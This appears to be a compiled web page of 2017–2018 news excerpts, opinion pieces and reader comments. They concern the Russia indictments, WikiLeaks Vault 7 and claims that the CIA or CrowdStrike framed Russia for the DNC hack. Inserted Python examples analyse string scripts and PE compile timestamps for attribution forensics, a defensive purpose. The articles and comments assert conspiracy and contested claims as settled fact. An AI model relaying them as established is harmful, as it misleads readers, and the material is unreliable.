He won't do it because he's digging tunnels for the big day.

BigPunny Fri, 02/16/2018 - 14:36 Permalink

"In other words, anyone who was disparaging Clinton, may have "unwittingly" been a collaborator of the 13 Russian "specialists" who cost Hillary the election. "

No, not "in other words." That's not what he said at all. Idiot propagandist.

devnickle Fri, 02/16/2018 - 14:36 Permalink

And Hillary has done nothing criminal in the last 40 years. All of the evidence has been a fabrication. The Russians perfected time travel technology in the 70's, and have been conspiring against her and planting evidence since then.

What planet am I living on again? We have now stepped into the twilight zone. Facepalm.....

moneybots Fri, 02/16/2018 - 14:55 Permalink

"Ultimately, and this is the punchline, the goal was to disparage Hillary Clinton and to assist the election of Donald Trump."

The goal of the MSM was the opposite. To unfairly disparage Trump and assist the election of Hillary Clinton. So why no indictments of members of the American MSM?

Montana Cowboy Fri, 02/16/2018 - 15:03 Permalink

What a bunch of horseshit. Mueller did nothing to locate just as much foreign or Russian support for Hillary. Grand Jury is just another one-sided court that passes judgment without any input from the other side. Now where have we seen that before? FISA.

What is wrong with anyone doing what they want to support a candidate? If that is somehow illegal interference, why is Soros running loose in the world?

I have a friend that was a US Federal Prosecutor. He once told me that the most un-American concepts that exist are grand juries and conspiracy laws. I'm sure he would have included FISA if it existed then.

dot_bust Fri, 02/16/2018 - 15:03 Permalink

The indictment adds that the Russians " were instructed to post content that focused on 'politics in the USA' and to 'use any opportunity to criticize Hillary and the rest (except Sanders and Trump -- we support them)' ."

Criticizing Hillary Clinton constitutes election interference? This is the dumbest thing I've ever heard.

Over half the United States said she was corrupt and morally bankrupt. Does that mean all those Americans interfered in the election?

Son of Captain Nemo Fri, 02/16/2018 - 15:04 Permalink

"Some Defendants, posing as U.S. persons and without revealing their Russian association, communicated with unwitting individuals associated with the Trump Campaign and with other political activists to seek to coordinate political activities."

I thought this was our "shtick" for subverting and overthrowing government(s) since 194_?... Fast forward to 2012 and subverting sovereign foreign government(s) using other means than election(s) ( https://jasirx.wordpress.com/ )

Just ask this person ( https://www.youtube.com/watch?v=CL_GShyGv3o ) who handed out cookies before starting an "overthrow of a sovereign government" right before a Winter Olympics?... And while we're on the subject of subversion of sovereign Nation(s) "OCONUS" ask this fat shit how it's going in the Middle East with its "partners" ( https://southfront.org/meeting-between-us-state-secretary-and-lebanese- ) Nor should we forget 22 within the Russian diplomatic community in the last 6 years "eliminated" for early retirement courtesy of the U.S. government...

And if all this is true why isn't Mueller indicting government officials within the FBI, Department of Immigration and Homeland Security that would allow "some defendants" to impersonate Americans after 9/11 and the security infrastructure we built around U.S. to prevent "future attacks" that were obviously (here illegally)???...

On second thought DON'T ANSWER THAT!!!

atabrigade Fri, 02/16/2018 - 15:05 Permalink

Our enemies are not overseas. They are right here at home.

Son of Captain Nemo -> atabrigade Fri, 02/16/2018 - 15:13 Permalink

That did this ( http://www.ae911truth.org/ ) to their own to grab oil everyplace else they didn't control it!

Concertedmaniac Fri, 02/16/2018 - 15:08 Permalink

What a complete load of horseshit. Waste of time and money while the crimes of the clintons and collaborators remain unpunished, including Mueller himself.

wobblie Fri, 02/16/2018 - 15:08 Permalink

"Mueller describes a sweeping, years-long, multimillion-dollar conspiracy by hundreds of Russians aimed at criticizing Hillary Clinton and supporting Senator Bernie Sanders and Trump"

Only in the idiot world of Liberalism and Conservatism is this not a laughable statement.

Stupid fucks.

https://therulingclassobserver.com/

Obamaroid Ointment Fri, 02/16/2018 - 15:10 Permalink

13 Russian bots to get life sentences in Twitter jail? Is a prisoner exchange with Putin for American bots a possibility?

[Feb 16, 2018] The source code shows that Marble has test examples not just in English but also in Chinese, Russian, Korean, Arabic and Farsi. This would permit a forensic attribution double game, for example by pretending that the spoken language of the malware creator was not American English, but Chinese, but then showing attempts to conceal the use of Chinese, drawing forensic investigators even more strongly to the wrong conclusion, --- but there are other possibilities, such as hiding fake error messages.

Dubbed "Marble," the part 3 of CIA files contains 676 source code files of a secret anti-forensic Marble Framework, which is basically an obfuscator or a packer used to hide the true source of CIA malware.
Notable quotes:
"... And the USA has indeed thoroughly developed means to falsely laying blame for cyber attacks it actually performs itself (next to it's proven credentials of falsely laying blame with chemical and terrorist attacks). ..."
Feb 16, 2018 | www.moonofalabama.org

xor | Feb 16, 2018 2:54:51 PM | 33

There indeed doesn't seem to be a motive to why the Russian authorities would launch a cyber attack that economically disrupts both itself, allies and other countries. Either the virus writers didn't care for a solution, hoped that a solution that never works might panic the victims even more so they make more cash transfers or enjoyed reaping money while seeing their victims suffer of something where there is no solution for. The last 2 reasons are short term because news that there is no solution for the ransomware will stop victims from making cash transfers. More convincing would be a cyber attack initiated by USA authorities that would hit already crumbling Ukraine businesses even further and create even more mistrust between Ukraine and Russia.

And the USA has indeed thoroughly developed means to falsely laying blame for cyber attacks it actually performs itself (next to it's proven credentials of falsely laying blame with chemical and terrorist attacks). On 31 March 2017:

WikiLeaks published hundreds of more files from the Vault 7 series today which, it claims, show how CIA can mask its hacking attacks to make it look like it came from other countries, including Russia, China, North Korea and Iran.

Dubbed "Marble," the part 3 of CIA files contains 676 source code files of a secret anti-forensic Marble Framework, which is basically an obfuscator or a packer used to hide the true source of CIA malware.

The CIA's Marble Framework tool includes a variety of different algorithms with foreign language text intentionally inserted into the malware source code to fool security analysts and falsely attribute attacks to the wrong nation.

...

The White House has condemned the revelations made by Wikileaks, saying that those responsible for leaking classified information from the agency should be held accountable by the law.

WikiLeaks Reveals 'Marble' Source Code that CIA Used to Frame Russia and China

Source code shows that Marble has test examples not just in English but also in Chinese, Russian, Korean, Arabic and Farsi. This would permit a forensic attribution double game, for example by pretending that the spoken language of the malware creator was not American English, but Chinese, but then showing attempts to conceal the use of Chinese, drawing forensic investigators even more strongly to the wrong conclusion, --- but there are other possibilities, such as hiding fake error messages.

WikiLeaks: Marble Framework

When the White House (doesn't matter who's ostensibly in charge) claims leaker's like Julian Assange should be accountable by the law, it of course means the malleable arbitrary law which none of the serpents in the White House, Langley, ... are accountable to.
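The Marble passage above carries a defender's lesson worth operationalising: foreign-language strings in a binary are an artifact that can be planted, so they belong in an inventory, not on the evidence side of an attribution. The Python below is an added example, not part of the WikiLeaks material or of any CIA tool; the sample bytes are a constructed blob with English, Russian, Chinese and Farsi strings, not real malware. It lists which Unicode scripts occur in a file's ASCII, UTF-8 and UTF-16LE strings, and also exposes a second trap that compounds the first: decoding UTF-16 at the wrong byte alignment turns Cyrillic or Arabic text into bogus "CJK" strings, so a naive strings pass can invent a third language the binary never contained.

```python
import re
import unicodedata
from collections import Counter
from dataclasses import dataclass

# Constructed sample "binary": a DOS stub message, a Russian message in UTF-16LE,
# a Chinese message in UTF-8, a Farsi message in UTF-16LE and a PDB path.
SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 12
    + b"This program cannot be run in DOS mode.\x00" + b"\x00" * 8
    + "Ошибка открытия файла".encode("utf-16le") + b"\x00\x00" + b"\x00" * 8
    + "无法连接服务器".encode("utf-8") + b"\x00" + b"\x00" * 8
    + "خطا در اتصال".encode("utf-16le") + b"\x00\x00" + b"\x00" * 8
    + b"C:\\build\\release\\agent.pdb\x00"
)

# Bytes that can belong to ASCII/UTF-8 text: printable ASCII or any high byte.
TEXT_RUN = re.compile(rb"[\x20-\x7e\x80-\xff]{4,}")
ASCII_RUN = re.compile(rb"[\x20-\x7e]{4,}")


@dataclass
class Found:
    start: int      # byte offset of the string in the sample
    end: int        # one past its last byte
    encoding: str
    text: str
    script: str     # dominant script of its letters: LATIN, CYRILLIC, CJK, ARABIC, ...


def script_of(ch: str) -> str:
    """First word of the Unicode name, which names the script for letters."""
    try:
        return unicodedata.name(ch).split()[0]
    except ValueError:
        return "UNKNOWN"


def dominant_script(text: str) -> str:
    counts = Counter(script_of(c) for c in text if c.isalpha())
    return counts.most_common(1)[0][0] if counts else "NONE"


def extract_utf8(data: bytes, min_len: int = 4) -> list:
    """ASCII and UTF-8 strings; a run that is not valid UTF-8 yields its ASCII sub-runs."""
    found = []
    for m in TEXT_RUN.finditer(data):
        try:
            pieces = [(m.start(), m.end(), m.group().decode("utf-8"))]
        except UnicodeDecodeError:
            pieces = [(m.start() + a.start(), m.start() + a.end(), a.group().decode("ascii"))
                      for a in ASCII_RUN.finditer(m.group())]
        for start, end, text in pieces:
            if len(text) >= min_len and text.isprintable():
                found.append(Found(start, end, "utf-8", text, dominant_script(text)))
    return found


def extract_utf16le(data: bytes, min_len: int = 4) -> list:
    """Printable runs of 16-bit code units, tried at both byte alignments."""
    found = []
    for align in (0, 1):
        run, start = [], None
        for i in range(align, len(data) - 1, 2):
            ch = chr(data[i] | (data[i + 1] << 8))
            if ch.isprintable():
                if start is None:
                    start = i
                run.append(ch)
                continue
            if len(run) >= min_len:
                text = "".join(run)
                found.append(Found(start, i, "utf-16le", text, dominant_script(text)))
            run, start = [], None
        if len(run) >= min_len:
            text = "".join(run)
            found.append(Found(start, start + 2 * len(run), "utf-16le", text, dominant_script(text)))
    return found


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Inventory of strings. UTF-8 hits are blanked before the UTF-16 pass and shorter
    candidates overlapping a longer one are dropped; without that, the odd-alignment
    decoding of the Cyrillic and Arabic bytes reports phantom CJK strings."""
    utf8 = extract_utf8(data, min_len)
    masked = bytearray(data)
    for f in utf8:
        masked[f.start:f.end] = b"\x00" * (f.end - f.start)
    cands = utf8 + extract_utf16le(bytes(masked), min_len)
    cands.sort(key=lambda f: (f.start - f.end, f.start))     # longest first
    kept = []
    for c in cands:
        if not any(c.start < k.end and k.start < c.end for k in kept):
            kept.append(c)
    return sorted(kept, key=lambda f: f.start)


def script_inventory(data: bytes) -> dict:
    """Per-script string counts: what an analyst records, not a verdict."""
    return dict(Counter(f.script for f in extract_strings(data)))


if __name__ == "__main__":
    for f in extract_strings(SAMPLE):
        print(f"{f.start:5d} {f.encoding:9s} {f.script:9s} {f.text}")
    print(script_inventory(SAMPLE))
```

On the constructed sample the inventory reports two LATIN strings, one CYRILLIC, one CJK and one ARABIC; the raw UTF-16 pass alone, by contrast, also returns CJK "strings" that start at odd offsets inside the Russian bytes. Either way, the output is a list of artifacts whose presence an obfuscator such as Marble can arrange at will, which is why it should be logged next to stronger signals rather than used to name a country.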

[Feb 12, 2018] A CIA Cyber False Flag by Federico Pieraccini.

Notable quotes:
"... Hardware and software vendors that are complicit -- most of which are American, British or Israeli -- give the CIA the opportunity to achieve informational full-spectrum dominance, relegating privacy to extinction. Such a convergence of power, money and technology entails major conflicts of interest, as can be seen in the case of Amazon AWS (Amazon's Cloud Service), cloud provider for the CIA , whose owner, Jeff Bezos, is also the owner of The Washington Post ..."
"... In general, when the 16 US spy agencies blamed Russia for the hacking of the elections, they were never specific in terms of forensic evidence. Simply put, the media, spies and politicians created false accusations based on the fact that Moscow, together with RT ..."
"... Now what is revealed through Wikileaks' publications in Vault 7 is the ability of a subsection of the CIA, known as Umbrage , to use malware, viruses, trojans and other cyber tools for their own geopolitical purposes. The CIA's Umbrage collects, analyzes and then employs software created variously from foreign security agencies, cyber mafia, private companies, and hackers in general. ..."
"... These revelations are yet more reason why countries targeted by Washington, like China, Russia, Iran and North Korea, should get rid of European and American products and invest in reducing technological dependence on American products in particular. ..."
"... This article first appeared on Strategic-Culture.org and was authored by Federico Pieraccini. ..."
Feb 08, 2018 | wearechange.org

Article via Strategic-Culture

New revelations from Wikileaks' 'Vault 7' leak shed a disturbing light on the safeguarding of privacy. Something already known and largely suspected has now become documented by Wikileaks. It seems evident that the CIA is now a state within a state, an entity out of control that has even arrived at the point of creating its own hacking network in order to avoid the scrutiny of the NSA and other agencies.

Reading the revelations contained in the documents released by WikiLeaks and adding them to those already presented in recent years by Snowden, it now seems evident that the technological aspect regarding espionage is a specialty in which the CIA, as far as we know, excels. Hardware and software vendors that are complicit -- most of which are American, British or Israeli -- give the CIA the opportunity to achieve informational full-spectrum dominance, relegating privacy to extinction. Such a convergence of power, money and technology entails major conflicts of interest, as can be seen in the case of Amazon AWS (Amazon's Cloud Service), cloud provider for the CIA, whose owner, Jeff Bezos, is also the owner of The Washington Post. It is a clear overlap of private interests that conflicts with the theoretical need to declare uncomfortable truths without the need to consider orders numbering in the millions of dollars from clients like the CIA.

While it is just one example, there are thousands more out there. The perverse interplay between media, spy agencies and politicians has compromised the very meaning of the much vaunted democracy of the land of the Stars and Stripes. The constant scandals that are beamed onto our screens now serve the sole purpose of advancing the deep interest of the Washington establishment. In geopolitical terms, it is now more than obvious that the deep state has committed all available means toward sabotaging any dialogue and détente between the United States and Russia. In terms of news, the Wikileaks revelations shed light on the methods used by US intelligence agencies like the CIA to place blame on the Kremlin, or networks associated with it, for the hacking that occurred during the American elections.

Perhaps this is too generous a depiction of matters, given that the general public has yet to see any evidence of the hacking of the DNC servers. In addition to this, we know that the origin of Podesta's email revelations stem from the loss of a smartphone and the low data-security measures employed by the chairman of Hillary Clinton's presidential campaign. In general, when the 16 US spy agencies blamed Russia for the hacking of the elections, they were never specific in terms of forensic evidence. Simply put, the media, spies and politicians created false accusations based on the fact that Moscow, together with RT and other media (not directly linked to the Kremlin), finally enjoy a major presence in the mainstream media. The biggest problem for the Washington establishment lies in the revelation of news that is counterproductive to the interests of the deep state. RT, Sputnik, this site and many others have diligently covered and reported to the general public every development concerning the Podesta revelations or the hacking of the DNC.

Now what is revealed through Wikileaks' publications in Vault 7 is the ability of a subsection of the CIA, known as Umbrage, to use malware, viruses, trojans and other cyber tools for their own geopolitical purposes. The CIA's Umbrage collects, analyzes and then employs software created variously from foreign security agencies, cyber mafia, private companies, and hackers in general. These revelations become particularly relevant when we consider the consequences of these actions. The main example can be seen in the hacking of the DNC. For now, what we know is that the hacking – if it ever occurred – is of Russian origin. This does not mean at all that the Kremlin directed it. It could actually be very much the opposite, its responsibility falling into the category of a cyber false-flag. One thing is for sure: all 16 US intelligence agencies are of the view that "the Russians did it". That said, the methods used to hack vulnerabilities cannot be revealed, so as to limit the spread of easily reusable exploits on systems, such as the one that hosted the DNC server. It is a great excuse for avoiding the revelation of any evidence at all.

So, with little information available, independent citizens are left with very little information on which to reliably form an opinion on what happened. There is no evidence, and no evidence will be provided to the media. For politicians and so-called mainstream journalists, this is an acceptable state of affairs. What we are left with instead is blind faith in the 16 spy agencies. The problem for them is that what WikiLeaks revealed with Vault 7 exposes a scenario that looks more likely than not: a cyber false-flag carried out by the Central Intelligence Agency using engineered malware and viruses made in Russia and hypothetically linking them back to hacking networks in Russia. In all likelihood, it looks like the Democrats' server was hacked by the CIA with the clear objective of leaving Russian fingerprints and obvious traces to be picked up by other US agencies.

In this way, it becomes easier to explain the unique views of all 16 spy agencies. Thus, it is far more likely that the CIA intentionally left fake Russian fingerprints all over the DNC server, thereby misleading other intelligence agencies in promoting the narrative that Russia hacked the DNC server. Of course the objective was to create a false narrative that could immediately be picked up by the media, creating even more hysteria surrounding any rapprochement with Russia.

Diversification of computer systems.

The revelations contained in the Wikileaks vault 7 (less than 1% of the total data in Wikileaks' possession has been released to date) have caused a stir, especially by exposing the astonishing complicity between hardware and software manufacturers, often intentionally creating backdoors in their products to allow access by the CIA and NSA. In today's digital environment, all essential services rely on computer technology and connectivity. These revelations are yet more reason why countries targeted by Washington, like China, Russia, Iran and North Korea, should get rid of European and American products and invest in reducing technological dependence on American products in particular.

The People's Republic has already started down this track, with the replacement of many network devices with local vendors like Huawei in order to avoid the type of interference revealed by Snowden. Russia has been doing the same in terms of software, even laying the groundwork to launch its own operating system, abandoning American and European systems. In North Korea, this idea was already put into practice years ago and is an excellent tool of deterrence against external interference. In more than one computer security conference, US experts have praised the capabilities of the DPRK to isolate its Internet network from the rest of the world, allowing them to have strong safety mechanisms. Often, the only access route to the DPRK systems is through the People's Republic of China, not the easiest way for the CIA or NSA to infiltrate a protected computer network.

An important aspect of the world in which we live today involves information security, something all nations have to deal with. At the moment, we still live in a world in which the realization of the danger and effect of hacking attacks are not apparent to many. On the other hand, militarily speaking, the diversification and rationalization of critical equipment in terms of networks and operability (smartphones, laptops, etc) has already produced strong growth in non-American and European manufacturers, with the aim of making their systems more secure.

This strengthening of technology also produces deleterious consequences, such as the need for intelligence agencies to be able to prevent the spread of data encryption so as to always enjoy access to any desired information. The birth of the Tor protocol, the deployment of Bitcoin, and apps that are more and more encrypted (although the WikiLeaks documents have shown that the collection of information takes place on the device before the information is encrypted) are all responses to an exponential increase in the invasion of privacy by federal or American government entities.

We live in a world that has an enormous dependence on the Internet and computer technology. The CIA over the years has focused on the ability to make sure vulnerable systems are exploited as well as seeking out major security flaws in consumer products without disclosing this to vendors, thereby taking advantage of these security gaps and leaving all consumers with a potential lack of security. Slowly, thanks to the work and courage of people like Snowden and Assange, the world is beginning to understand how important it is to keep personal data under control and prevent access to it by third parties, especially if they are state actors. In the case of national security, the issue is expanded exponentially by the need to protect key and vital infrastructure, considering how many critical services operate via the Internet and rely on computing devices.

The wars of the future will have a strong technological basis, and it is no coincidence that many armed forces, primarily the Russian and Chinese, have opted in recent years to training troops, and conducting operations, not completely relying on connectivity. No one can deny that in the event of a large-scale conflict, connectivity is far from guaranteed. One of the major goals of competing nations is to penetrate the military security systems of rival nations and be able to disarm the internal networks that operates major systems of defense and attack.

The Wikileaks revelations are yet another confirmation of how important it is to break the technological unipolar moment, if it may be dubbed this way, especially for nations targeted by the United States. Currently Washington dictates the technological capacities of the private and government sectors of Europe and America, steering their development, timing and methods to suit its own interests. It represents a clear disadvantage that the PRC and its allies will inevitably have to redress in the near future in order to achieve full security for its vital infrastructure.


This article first appeared on Strategic-Culture.org and was authored by Federico Pieraccini.

[Jan 15, 2018] WikiLeaks reveals that literally every router in America has been compromised

failedevolution.blogspot.gr
The latest Wikileaks Vault7 release reveals details of the CIA's alleged Cherry Blossom project, a scheme that uses wireless devices to access users' internet activity.

globinfo freexchange

As cyber security expert John McAfee told RT and Natasha Sweatte:

Virtually, every router that's in use in the American home are accessible to hackers, to the CIA, that they can take over the control of the router, they can monitor all of the traffic, and worse, they can download malware into any device that is connected to that router.

I personally, never connect to any Wi-Fi system, I use the LTE on my phone. That's the only way that I can be secure because every router in America has been compromised.

We've been warning about it for years, nobody pays attention until something like WikiLeaks comes up and says 'look, this is what's happening'. And it is devastating in terms of the impact on American privacy because once the router is compromised and it infects the cell phones that are attached, your laptop, your desktop computer, your tablet, then they become compromised and [someone] can watch the data, start listening to conversations, start watching through the cameras on these devices.

We are in a situation with our government where they know everything about us and we know nothing about what the government is doing. They have the right to privacy and secrecy, but the individual does not, anymore.

[Jan 03, 2018] Nation-State Hacking 2017 in Review by Eva Galperin

Jan 03, 2018 | www.truth-out.org

WannaCry and Petya both owe their effectiveness to a Microsoft Windows security vulnerability that had been found by the NSA and code-named EternalBlue, which was stolen and released by a group calling themselves the Shadow Brokers. US agencies losing control of their hacking tools has been a recurring theme in 2017. First, companies, hospitals, and government agencies found themselves targeted by re-purposed NSA exploits that we all rushed to patch; then Wikileaks published Vault 7, a collection of CIA hacking tools that had been leaked to them, following it up with the publication of source code for tools in Vault 8.

...In December, Citizen Lab published a report documenting the Ethiopian government's ongoing efforts to spy on journalists and dissidents, this time with the help of software provided by Cyberbit, an Israeli company. The report also tracked Cyberbit as their salespeople demonstrated their surveillance product to governments including France, Vietnam, Kazakhstan, Rwanda, Serbia, and Nigeria. Other perennial bad actors also made a splash this year, including Vietnam, whose government was linked to Ocean Lotus, or APT 32 in a report from FireEye . The earliest known samples from this actor were found by EFF in 2014 , when they were used to target our activists and researchers.

Eva Galperin is EFF's Director of Cybersecurity. Prior to 2007, when she came to work for EFF, Eva worked in security and IT in Silicon Valley and earned degrees in Political Science and International Relations from SFSU. Her work is primarily focused on providing privacy and security for vulnerable populations around the world.

[Dec 28, 2017] How CrowdStrike placed malware in DNC hacked servers by Alex Christoforou

Highly recommended!
If this is true, then this is definitely a sophisticated false flag operation. Was the malware that Alperovich's people injected specifically designed to implicate Russians? In other words, CrowdStrike = Fancy Bear.
Images removed. For full content please see the original source.
One interesting corollary of this analysis is that installing CrowdStrike software is like inviting a wolf to guard your chickens. If they are that dishonest, you take enormous risks. The same might be true of some other heavily advertised "intrusion prevention" toolkits. And those criminals who use mistyped popular addresses, or buy Google search ads, to drive lemmings to their site and then flash a screen saying that they detected a virus on your computer and that you should call the number provided so that, for a small amount of money, your virus will be removed, get a new and more sinister life.
I have suspected many such firms (for example ISS, which was bought by IBM in 2006) of being scams for a long time.
Notable quotes:
"... They found that generally, in a lot of cases, malware developers didn't care to hide the compile times and that while implausible timestamps are used, it's rare that these use dates in the future. It's possible, but unlikely that one sample would have a postdated timestamp to coincide with their visit by mere chance but seems extremely unlikely to happen with two or more samples. Considering the dates of CrowdStrike's activities at the DNC coincide with the compile dates of two out of the three pieces of malware discovered and attributed to APT-28 (the other compiled approximately 2 weeks prior to their visit), the big question is: Did CrowdStrike plant some (or all) of the APT-28 malware? ..."
"... The IP address, according to those articles, was disabled in June 2015, eleven months before the DNC emails were acquired – meaning those IP addresses, in reality, had no involvement in the alleged hacking of the DNC. ..."
"... The fact that two out of three of the Fancy Bear malware samples identified were compiled on dates within the apparent five day period CrowdStrike were apparently at the DNC seems incredibly unlikely to have occurred by mere chance. ..."
"... That all three malware samples were compiled within ten days either side of their visit – makes it clear just how questionable the Fancy Bear malware discoveries were. ..."
Dec 28, 2017 | theduran.com

Of course the DNC did not want the FBI to investigate its "hacked servers". The plan was well underway to excuse Hillary's pathetic election defeat to Trump, and CrowdStrike would help out by planting evidence to pin on those evil "Russian hackers." Some would call this entire DNC server hack an "insurance policy."

... ... ...
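The timestamp reasoning in the quotes above (a compile date later than the moment the sample was acquired is impossible, and two or more compile dates falling inside the responders' own on-site window are hard to explain by chance) can be turned into a mechanical triage check. The following Python is an added example, not code from the article or from any party it names. The header parsing follows the documented PE layout (the e_lfanew offset at 0x3C, then the "PE\0\0" signature, then the COFF header whose TimeDateStamp sits 4 bytes after Machine and NumberOfSections); the engagement window, acquisition time and the four samples are constructed placeholders, not the dates or files of the case. A compile timestamp is trivially set by whoever builds the binary, so a flag here is a reason to demand corroboration from other evidence, not a conclusion in either direction.

```python
import struct
from datetime import datetime, timedelta, timezone

UTC = timezone.utc

# Constructed engagement data (placeholders): the responders' on-site window and
# the moment the samples were acquired from the host.
WINDOW_START = datetime(2020, 1, 10, tzinfo=UTC)
WINDOW_END = datetime(2020, 1, 14, 23, 59, 59, tzinfo=UTC)
FIRST_SEEN = datetime(2020, 1, 14, 12, 0, tzinfo=UTC)


def pe_timestamp(data: bytes) -> int:
    """Read the COFF TimeDateStamp (seconds since the Unix epoch) from a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    # COFF header layout: Machine(2) NumberOfSections(2) TimeDateStamp(4) ...
    return struct.unpack_from("<I", data, e_lfanew + 8)[0]


def build_stub_pe(timestamp: int) -> bytes:
    """Constructed minimal PE header (not loadable) that carries the given timestamp."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)      # e_lfanew: PE header follows the DOS header
    coff = struct.pack("<HHIIIHH", 0x014C, 1, timestamp, 0, 0, 0, 0x0102)
    return bytes(dos) + b"PE\0\0" + coff


def assess(ts: int, first_seen: datetime, window_start: datetime, window_end: datetime,
           near: timedelta = timedelta(days=10), slack: timedelta = timedelta(hours=24)) -> list:
    """Flags for one compile timestamp relative to the acquisition time and the window."""
    if ts == 0:
        return ["stripped"]              # zeroed by the build: says nothing either way
    compiled = datetime.fromtimestamp(ts, tz=UTC)
    flags = []
    if compiled > first_seen + slack:
        flags.append("postdated")       # "compiled" after it was already on disk: forged
    if window_start <= compiled <= window_end:
        flags.append("in-window")       # built while the responders were on site
    elif window_start - near <= compiled <= window_end + near:
        flags.append("near-window")     # within `near` of the window on either side
    return flags or ["unremarkable"]


def triage(samples: dict, first_seen: datetime = FIRST_SEEN,
           window_start: datetime = WINDOW_START, window_end: datetime = WINDOW_END) -> dict:
    """Map each sample name to its timestamp flags."""
    return {name: assess(pe_timestamp(blob), first_seen, window_start, window_end)
            for name, blob in samples.items()}


def count_in_window(samples: dict, **kw) -> int:
    """How many samples were 'compiled' during the window; one may be chance, several are not."""
    return sum("in-window" in flags for flags in triage(samples, **kw).values())


def _epoch(dt: datetime) -> int:
    return int(dt.timestamp())


# Constructed samples: one built inside the window, one a week before it,
# one dated a month after it was acquired, one with a zeroed timestamp.
CONSTRUCTED_SAMPLES = {
    "sample_a.dll": build_stub_pe(_epoch(datetime(2020, 1, 12, 3, 0, tzinfo=UTC))),
    "sample_b.dll": build_stub_pe(_epoch(datetime(2020, 1, 3, 9, 30, tzinfo=UTC))),
    "sample_c.exe": build_stub_pe(_epoch(datetime(2020, 2, 10, 0, 0, tzinfo=UTC))),
    "sample_d.sys": build_stub_pe(0),
}

if __name__ == "__main__":
    for name, flags in triage(CONSTRUCTED_SAMPLES).items():
        print(f"{name:14s} {pe_timestamp(CONSTRUCTED_SAMPLES[name]):>11d}  {', '.join(flags)}")
    print("samples compiled inside the window:", count_in_window(CONSTRUCTED_SAMPLES))
```

Run against real files, `triage` takes a dict of file name to file contents and the window and acquisition time from the engagement record; the only thing it reads from each file is the header field, so it is safe to run on quarantined samples. The `near` margin reproduces the "ten days either side" framing from the quotes and can be narrowed to the responders' actual on-site days.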

[Dec 18, 2017] Gaius Publius: Explosive WikiLeaks Release Exposes Massive, Aggressive CIA Cyber Spying, Hacking Capability

Notable quotes:
"... Donald Trump is deep in the world of spooks now, the world of spies, agents and operatives. He and his inner circle have a nest of friends, but an even larger, more varied nest of enemies. As John Sevigny writes below, his enemies include not only the intel and counter-intel people, but also "Republican lawmakers, journalists, the Clintons, the Bush family, Barack Obama, the ACLU, every living Democrat and even Rand Paul." ..."
"... A total of 8,761 documents have been published as part of 'Year Zero', the first in a series of leaks the whistleblower organization has dubbed 'Vault 7.' WikiLeaks said that 'Year Zero' revealed details of the CIA's "global covert hacking program," including "weaponized exploits" used against company products including " Apple's iPhone , Google's Android and Microsoft's Windows and even Samsung TVs , which are turned into covert microphones." ..."
"... According to the statement from WikiLeaks, government hackers can penetrate Android phones and collect "audio and message traffic before encryption is applied." ..."
"... "CIA turned every Microsoft Windows PC in the world into spyware. Can activate backdoors on demand, including via Windows update "[.] ..."
"... Do you still trust Windows Update? ..."
"... As of October 2014 the CIA was also looking at infecting the vehicle control systems used by modern cars and trucks. ..."
"... "Richard Clarke, the counterterrorism chief under both Bill Clinton and George W. Bush, told the Huffington Post that Hastings's crash looked consistent with a car cyber attack.'" Full and fascinating article here . ..."
"... Recently, the CIA lost control of the majority of its hacking arsenal including malware, viruses, trojans, weaponized "zero day" exploits, malware remote control systems and associated documentation. This extraordinary collection, which amounts to more than several hundred million lines of code, gives its possessor the entire hacking capacity of the CIA The archive appears to have been circulated among former U.S. government hackers and contractors in an unauthorized manner, one of whom has provided WikiLeaks with portions of the archive. ..."
"... Since 2001 the CIA has gained political and budgetary preeminence over the U.S. National Security Agency (NSA). The CIA found itself building not just its now infamous drone fleet, but a very different type of covert, globe-spanning force - its own substantial fleet of hackers. The agency's hacking division freed it from having to disclose its often controversial operations to the NSA (its primary bureaucratic rival) in order to draw on the NSA's hacking capacities. ..."
"... By the end of 2016, the CIA's hacking division, which formally falls under the agency's Center for Cyber Intelligence (CCI), had over 5000 registered users and had produced more than a thousand hacking systems, trojans, viruses, and other "weaponized" malware. Such is the scale of the CIA's undertaking that by 2016, its hackers had utilized more code than that used to run Facebook. The CIA had created, in effect, its "own NSA" with even less accountability and without publicly answering the question as to whether such a massive budgetary spend on duplicating the capacities of a rival agency could be justified. ..."
"... I learned this when I was in my 20s. The Catholic Church was funding my early critique of American foreign aid as being imperialist. I asked whether they thought I should go into politics. They said, "No, you'd never make it". And I said, "Why?" and they said, "Well, nobody has a police record or any other dirt on you." I asked what they meant. They said, "Unless they have something over you to blackmail you with, you're not going to be able to get campaign funding. Because they believe that you might do something surprising," in other words, something they haven't asked you to do. So basically throughout politics, on both sides of the spectrum, voters have candidates who are funded by backers who have enough over them that they can always blackmail. ..."
"... The campaign to frame up and discredit Trump and his associates is characteristic of how a police state routinely operates. A national security apparatus that vacuums up all our communications and stores them for later retrieval has been utilized by political operatives to go after their enemies – and not even the President of the United States is immune. This is something that one might expect to occur in, say, Turkey, or China: that it is happening here, to the cheers of much of the media and the Democratic party, is beyond frightening. ..."
"... 4th impressions – I went looking for the "juicy bits" of interest to me – SOHO routers, small routers – sadly its just a table documenting routers sold around the world, and whether these guys have put the firmware in their Stash Repository. Original firmware, not hacked one. But the repository isn't in the vault dump, AFAIK. ..."
"... The WikiLeaks docs show that CIA has developed means to use all personal digital device microphones and cameras even when they are "off," and to send all of your files and personal data to themselves, and to send your private messages to themselves before they are encrypted. They have installed these spyware in the released version of Windows 10, and can easily install them on all common systems and devices. ..."
"... So we have a zillion ways to spy and hack and deceive and assassinate, but no control. I think this is what the military refers to as "being overtaken by events." ..."
"... My godfather was in the CIA in the late sixties and early seventies, and he said that outside of the President's pet projects there was no way to sift through and bring important information to decision makers before it made the Washington Post (he is aware of the irony) and hit the President's breakfast table. ..."
"... To what extent do these hacks represent the CIA operating within the US? To what extent is that illegal? With the democrats worshipping the IC, will anyone in an official position dare to speak out? ..."
"... Schumer said that as he understands, intelligence officials are "very upset with how [Trump] has treated them and talked about them ..."
